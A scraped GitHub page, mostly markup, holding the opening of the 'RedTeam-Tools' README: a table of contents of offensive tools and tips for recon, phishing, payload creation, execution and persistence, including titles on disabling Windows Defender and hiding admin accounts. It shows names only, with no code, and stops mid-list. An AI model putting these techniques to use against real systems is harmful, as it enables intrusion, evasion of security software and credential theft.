1.042.018.751.751 0 0 1 .018 1.042Z"></path> </svg> </span> <span data-view-component="true" class="ActionListItem-label"> Insights </span> </a> </li> </ul> </div></action-list> </div> </div></anchored-position> </focus-group> </action-menu></div> </nav> </div> <turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " > <h1 class='sr-only'>A-poc/RedTeam-Tools</h1> <div class="clearfix container-xl px-md-4 px-lg-5 px-3"> <div> <div style="max-width: 100%" data-view-component="true" class="Layout Layout--flowRow-until-md react-repos-overview-margin Layout--sidebarPosition-end Layout--sidebarPosition-flowRow-end"> <div data-view-component="true" class="Layout-main"> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_es_mjs-dd1d3ea6a436.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-17c672-34345cb18aac.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_paths_index_ts-e019c54eb886.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-7496afc3784d.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-7094d4-15017f02e61c.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-5f1d09-1ee828c2d6e8.js"></script> <script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repos-overview-d245eae13daf.js"></script> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-react.423a6445b565d6511bd7.module.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/repos-overview.0ee7cac3ab511a65d9f9.module.css" /> <react-partial partial-name="repos-overview" data-ssr="true" data-attempted-ssr="true" > <script type="application/json" data-target="react-partial.embeddedData">{"props":{"initialPayload":{"allShortcutsEnabled":false,"path":"/","repo":{"id":538444958,"defaultBranch":"main","name":"RedTeam-Tools","ownerLogin":"A-poc","currentUserCanPush":false,"isFork":false,"isEmpty":false,"createdAt":"2022-09-19T10:20:29.000Z","ownerAvatar":"https://avatars.githubusercontent.com/u/100603074?v=4","public":true,"private":false,"isOrgOwned":false},"currentUser":null,"refInfo":{"name":"main","listCacheKey":"v0:1663582829.975821","canEdit":false,"refType":"branch","currentOid":"73c080931ef98664485ea143de7db8d265985a32"},"tree":{"items":[{"name":"README.md","path":"README.md","contentType":"file"},{"name":"backlog","path":"backlog","contentType":"file"}],"templateDirectorySuggestionUrl":null,"readme":null,"totalCount":2,"showBranchInfobar":false},"fileTree":null,"fileTreeProcessingTime":null,"foldersToFetch":[],"treeExpanded":false,"symbolsExpanded":false,"isOverview":true,"overview":{"banners":{"shouldRecommendReadme":false,"isPersonalRepo":false,"showUseActionBanner":false,"actionSlug":null,"actionId":null,"showProtectBranchBanner":false,"publishBannersInfo":{"dismissActionNoticePath":"/settings/dismiss-notice/publish_action_from_repo","releasePath":"/A-poc/RedTeam-Tools/releases/new?marketplace=true","showPublishActionBanner":false},"interactionLimitBanner":null,"showInvitationBanner":false,"inviterName":null,"actionsMigrationBannerInfo":{"releaseTags":[],"showImmutableActionsMigrationBanner":false,"initialMigrationStatus":null}},"codeButton":{"contactPath":"/contact","isEnterprise":false,"local":{"protocolInfo":{"httpAvailable":true,"sshAvailable":null,"httpUrl":"https://github.com/A-poc/RedTeam-Tools.git","showCloneWarning":null,"sshUrl":null,"sshCertificatesRequired":null,"sshCertificatesAvailable":null,"ghCliUrl":"gh repo clone A-poc/RedTeam-Tools","defaultProtocol":"http","newSshKeyUrl":"/settings/ssh/new","setProtocolPath":"/users/set_protocol"},"platformInfo":{"cloneUrl":"https://desktop.github.com","showVisualStudioCloneButton":false,"visualStudioCloneUrl":"https://windows.github.com","showXcodeCloneButton":false,"xcodeCloneUrl":"xcode://clone?repo=https%3A%2F%2Fgithub.com%2FA-poc%2FRedTeam-Tools","zipballUrl":"/A-poc/RedTeam-Tools/archive/refs/heads/main.zip"}},"newCodespacePath":"/codespaces/new?hide_repo_select=true\u0026repo=538444958"},"popovers":{"rename":null,"renamedParentRepo":null},"commitCount":"197","overviewFiles":[{"displayName":"README.md","repoName":"RedTeam-Tools","refName":"main","path":"README.md","preferredFileType":"readme","tabName":"README","richText":"\u003carticle class=\"markdown-body entry-content container-lg\" itemprop=\"text\"\u003e\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eRedTeam-Tools\u003c/h1\u003e\u003ca id=\"user-content-redteam-tools\" class=\"anchor\" aria-label=\"Permalink: RedTeam-Tools\" href=\"#redteam-tools\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp align=\"center\" dir=\"auto\"\u003e\n\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png\" height=\"300\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThis github repository contains a collection of \u003cstrong\u003e150+\u003c/strong\u003e \u003cstrong\u003etools\u003c/strong\u003e and \u003cstrong\u003eresources\u003c/strong\u003e that can be useful for \u003cstrong\u003ered teaming activities\u003c/strong\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e🔗 If you are a Blue Teamer, check out \u003ca href=\"https://github.com/A-poc/BlueTeam-Tools\"\u003eBlueTeam-Tools\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eWarning\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eThe materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.\u003c/em\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eHide Tool List headings with the arrow.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eClick 🔙 to get back to the list.\u003c/em\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eTool List\u003c/h1\u003e\u003ca id=\"user-content-tool-list\" class=\"anchor\" aria-label=\"Permalink: Tool List\" href=\"#tool-list\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eRed Team Tips\u003c/b\u003e 19 tips\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#improved-html-smuggling-with-mouse-move-eventlistener\"\u003eImproved HTML smuggling with mouse move eventlistener\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @pr0xylife\u003c/i\u003e\u003c/li\u003e\n \t\u003cli\u003e\u003cb\u003e\u003ca href=\"#google-translate-for-phishing\"\u003eGoogle translate for phishing\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hiding-the-local-admin-account\"\u003eHiding the local admin account\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cripple-windows-defender-by-deleting-signatures\"\u003eCripple windows defender by deleting signatures\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enable-multiple-rdp-sessions-per-user\"\u003eEnable multiple RDP sessions per user\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sysinternals-psexecexe-local-alternative\"\u003eSysinternals PsExec.exe local alternative\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#live-off-the-land-port-scanner\"\u003eLive off the land port scanner\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#proxy-aware-powershell-downloadstring\"\u003eProxy aware PowerShell DownloadString\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#looking-for-internal-endpoints-in-browser-bookmarks\"\u003eLooking for internal endpoints in browser bookmarks\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#query-dns-records-for-enumeration\"\u003eQuery DNS records for enumeration\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#unquoted-service-paths-without-powerup\"\u003eUnquoted service paths without PowerUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bypass-a-disabled-command-prompt-with-k\"\u003eBypass a disabled command prompt with /k\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Martin Sohn Christensen\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#stop-windows-defender-deleting-mimikatzexe\"\u003eStop windows defender deleting mimikatz.exe\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @GuhnooPlusLinux\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-if-you-are-in-a-virtual-machine\"\u003eCheck if you are in a virtual machine\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @dmcxblue\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enumerate-applocker-rules\"\u003eEnumerate AppLocker rules\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @Alh4zr3d\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cmd-shortcut-with-6-pixels-via-mspaint\"\u003eCMD shortcut with 6 pixels via mspaint\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PenTestPartners\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#link-spoofing-with-preventdefault-javascript-method\"\u003eLink spoofing with PreventDefault JavaScript method\u003c/a\u003e\u003c/b\u003e\u003ci\u003e \u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#check-smb-firewall-rules-with-responder\"\u003eCheck SMB firewall rules with Responder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @malmoeb\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#disable-av-with-sysinternals-pssuspend\"\u003eDisable AV with SysInternals PsSuspend\u003c/a\u003e\u003c/b\u003e\u003ci\u003e @0gtweet\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e \n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eReconnaissance\u003c/b\u003e 24 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#spiderfoot\"\u003espiderfoot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated OSINT and attack surface mapping\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#reconftw\"\u003ereconftw\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated subdomain and vulnerability recon tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#subzy\"\u003esubzy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain takeover vulnerability checker\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#smtp-user-enum\"\u003esmtp-user-enum\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SMTP user enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crtsh---httprobe---eyewitness\"\u003ecrt.sh -\u0026gt; httprobe -\u0026gt; EyeWitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Automated domain screenshotting\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#jsendpoints\"\u003ejsendpoints\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Extract page DOM links\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#nuclei\"\u003enuclei\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#certsniff\"\u003ecertSniff\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Certificate transparency log keyword sniffer\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gobuster\"\u003egobuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Website path brute force\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#feroxbuster\"\u003eferoxbuster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fast content discovery tool written in Rust\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloudbrute\"\u003eCloudBrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cloud infrastructure brute force\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#dnsrecon\"\u003ednsrecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Enumerate DNS records\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#shodanio\"\u003eShodan.io\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Public facing system knowledge base\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#aort\"\u003eAORT (All in One Recon Tool)\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Subdomain enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#spoofcheck\"\u003espoofcheck\u003c/a\u003e\u003c/b\u003e\u003ci\u003e SPF/DMARC record checker\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#awsbucketdump\"\u003eAWSBucketDump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e S3 bucket enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#githarvester\"\u003eGitHarvester\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential searcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#trufflehog\"\u003etruffleHog\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub credential scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#dismap\"\u003eDismap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Asset discovery/identification\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enum4linux\"\u003eenum4linux\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/samba enumeration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#skanuvaty\"\u003eskanuvaty\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dangerously fast dns/network/port scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#metabigor\"\u003eMetabigor\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OSINT tool without API\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gitrob\"\u003eGitrob\u003c/a\u003e\u003c/b\u003e\u003ci\u003e GitHub sensitive information scanner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gowitness\"\u003egowitness\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Web screenshot utility using Chrome Headless\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eResource Development\u003c/b\u003e 12 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#remoteinjector\"\u003eremoteinjector\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Inject remote template link into word document\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#chimera\"\u003eChimera\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell obfuscation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#msfvenom\"\u003emsfvenom\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#shellter\"\u003eShellter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Dynamic shellcode injection tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#freeze\"\u003eFreeze\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Payload creation (circumventing EDR)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wordsteal\"\u003eWordSteal\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Steal NTML hashes with Microsoft Word\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ntapi-undocumented-functions\"\u003eNTAPI Undocumented Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows NT Kernel, Native API and drivers\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#kernel-callback-functions\"\u003eKernel Callback Functions\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Undocumented Windows APIs\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#offensivevba\"\u003eOffensiveVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Office macro code execution and evasion techniques\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wsh\"\u003eWSH\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Wsh payload\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hta\"\u003eHTA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Hta payload\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#vba\"\u003eVBA\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Vba payload\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eInitial Access\u003c/b\u003e 10 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#credmaster\"\u003eCredMaster\u003c/a\u003e\u003c/b\u003e\u003ci\u003e CredKing password spraying tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#trevorspray\"\u003eTREVORspray\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Password sprayer with threading\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilqr\"\u003eevilqr\u003c/a\u003e\u003c/b\u003e\u003ci\u003e QRLJacking phishing PoC\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#cupp\"\u003eCUPP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common User Passwords Profiler (CUPP)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bash-bunny\"\u003eBash Bunny\u003c/a\u003e\u003c/b\u003e\u003ci\u003e USB attack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evilgophish\"\u003eEvilGoPhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#social-engineer-toolkit-set\"\u003eThe Social-Engineer Toolkit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hydra\"\u003eHydra\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Brute force tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#squarephish\"\u003eSquarePhish\u003c/a\u003e\u003c/b\u003e\u003ci\u003e OAuth/QR code phishing framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#king-phisher\"\u003eKing Phisher\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Phishing campaign framework\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eExecution\u003c/b\u003e 13 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#responder\"\u003eResponder\u003c/a\u003e\u003c/b\u003e\u003ci\u003e LLMNR, NBT-NS and MDNS poisoner\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#secretsdump\"\u003esecretsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote hash dumper\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#evil-winrm\"\u003eevil-winrm\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WinRM shell\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#donut\"\u003eDonut\u003c/a\u003e\u003c/b\u003e\u003ci\u003e In-memory .NET execution\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#macro_pack\"\u003eMacro_pack\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Macro obfuscation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powersploit\"\u003ePowerSploit\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell script suite\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#rubeus\"\u003eRubeus\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory hack tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpup\"\u003eSharpUp\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows vulnerability identifier\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sqlrecon\"\u003eSQLRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Offensive MS-SQL toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ultimateapplockerbypasslist\"\u003eUltimateAppLockerByPassList\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Common AppLocker Bypass Techniques\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#starfighters\"\u003eStarFighters\u003c/a\u003e\u003c/b\u003e\u003ci\u003e JavaScript and VBScript Based Empire Launcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#demiguise\"\u003edemiguise\u003c/a\u003e\u003c/b\u003e\u003ci\u003e HTA encryption tool\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerzure\"\u003ePowerZure\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell framework to assess Azure security\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003ePersistence\u003c/b\u003e 4 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#impacket\"\u003eImpacket\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python script suite\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#empire\"\u003eEmpire\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Post-exploitation framework\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpersist\"\u003eSharPersist\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows persistence toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#ligolo-ng\"\u003eligolo-ng\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Tunneling tool that uses a TUN interface\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003ePrivilege Escalation\u003c/b\u003e 11 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul 